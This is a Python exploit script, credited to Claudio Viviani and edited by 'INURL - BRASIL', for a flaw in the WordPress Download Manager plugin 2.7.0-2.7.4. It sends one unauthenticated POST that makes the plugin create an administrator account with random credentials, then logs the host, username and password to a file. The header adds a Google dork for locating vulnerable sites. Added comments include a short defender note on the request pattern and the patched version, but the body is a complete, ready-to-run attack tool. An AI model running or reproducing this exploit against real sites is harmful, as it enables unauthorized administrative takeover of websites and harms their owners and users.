- #!/usr/bin/python
- # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
- # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
- # Exploit written by Claudio Viviani - http://www.homelab.it / Edited INURL - BRASIL
- # 2014-12-03: Discovered vulnerability
- # 2014-12-04: Patch released (2.7.5)
- # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
- # Dork google: index of "wordpress-download"
- import urllib, urllib2, socket
- import sys
- import string, random
- import optparse
- import datetime
- import os
- # Check url
def checkurl(url):
    """Return *url* unchanged when it starts with an explicit http:// or https:// scheme.

    Any other prefix prints an error line and terminates the process with
    exit status 1 (``SystemExit``). The comparison is case-sensitive, exactly
    as in the prefix-slice check it replaces.
    """
    has_scheme = url.startswith("http://") or url.startswith("https://")
    if not has_scheme:
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    return url
# Check that the file exists and is readable
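def checkfile(file):
    """Return *file* if it names an existing, readable regular file.

    Otherwise print a timestamped error line and exit with status 1
    (``SystemExit``).

    Fix: the original joined the two tests with ``and``, so a file that
    exists but is not readable passed the check; the comment above the
    function states the intended condition, which needs ``or``.

    The parameter name ``file`` shadows the builtin; it is kept because
    it is part of the function's interface.
    """
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # single-argument print(...) behaves the same under Python 2 and 3
        print("0x" + str(now) + "[INFO][ERROR]: " + file + " file is missing or not readable")
        sys.exit(1)
    return file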
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Build a string of *size* characters, each drawn from *chars*.

    Every position is chosen independently with ``random.choice`` (the
    non-cryptographic ``random`` module), so a fixed seed reproduces the
    same string. Defaults to six ASCII letters or digits.
    """
    picks = []
    for _ in range(size):
        picks.append(random.choice(chars))
    return ''.join(picks)
# Script body (Python 2: print statements, urllib/urllib2).
# Flow: parse -t/--target and --timeout, validate the URL, send a single
# POST to the target's root, and report success or failure on stdout.
# Note: checkfile() defined above is never called from this script.
banner = """
0x[EXPLOIT NAME]: Wordpress Download Manager R3m0t3 C0d3 Ex3cut10n / INURL - BRASIL
------------------------------------------------------------------------------------------------------------------
"""
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('--timeout', action="store", default=10, type="int",
                       help="[Timeout Value] - Default 10",
                       )
# `remainder` (positional arguments) is parsed but never used.
options, remainder = commandList.parse_args()
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
# checkurl() exits the process unless the scheme is http:// or https://.
host = checkurl(options.target)
timeout = options.timeout
print(banner)
# Process-wide default: applies to every socket opened afterwards, including urllib2's.
socket.setdefaulttimeout(timeout)
# Random credentials for the account the request asks the plugin to create.
username = id_generator()
pwd = id_generator()
# The POST asks the plugin's AJAX dispatcher (action=wpdm_ajax_call) to run
# wp_insert_user with role "administrator" — the authorization gap the
# advisory in the file header describes (fixed in 2.7.5 per the header).
# Defender note: an unauthenticated POST carrying action=wpdm_ajax_call
# together with execute=wp_insert_user is the request pattern to alert on;
# the remediation is the plugin upgrade named in the header.
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})
# Static User-Agent header sent with the request.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
# Timestamp captured before the request; the except branches below reuse
# this value rather than refreshing it.
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print "0x" + str(now) + "[INFO]: Tryng to connect to: "+host
try:
    # Passing a data body makes urllib2 issue a POST to host + "/".
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()
    # Success is inferred solely from an empty response body; any other
    # body (including an error page) is reported as failure. Fragile check.
    if html == "":
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print("0x" + str(now) + "[INFO][VALUE]: Account Added")
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print("0x" + str(now) + "[INFO][VALUE]: Location: "+host+"/wp-login.php")
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print("0x" + str(now) + "[INFO][VALUE]: Username: "+username)
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print("0x" + str(now) + "[INFO][VALUE]: Password: "+pwd)
        # Result line is written to a fixed file name in the current working directory.
        file_saved = 'Wordpress_Download_Manager_R3m0t3_C0d3_Ex3cut10n.txt'
        msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
        # NOTE: no separator before "PWD::", so username and "PWD::" run together in the file.
        url_saved = "HOST:: "+host+" USER:: "+username+"PWD:: "+pwd+"\n"
        # Both branches do the same write; mode 'a' already creates a missing file,
        # so the os.path.exists() split is redundant. Files are closed explicitly,
        # not via `with`.
        if os.path.exists(file_saved):
            arquivo = open(file_saved, 'a')
            arquivo.write(url_saved)
            arquivo.close()
            print(msg)
        else:
            arquivo = open(file_saved, 'w')
            arquivo.write(url_saved)
            arquivo.close()
            print(msg)
    else:
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print("0x" + str(now) + "[INFO][FAIL]: Exploitation Failed :(")
# HTTPError is a URLError subclass, so it must be caught first (as it is here).
except urllib2.HTTPError as e:
    print("0x" + str(now) + "[INFO][ERROR]: "+str(e))
except urllib2.URLError as e:
    print("0x" + str(now) + "[INFO][ERROR]: Connection Error: "+str(e))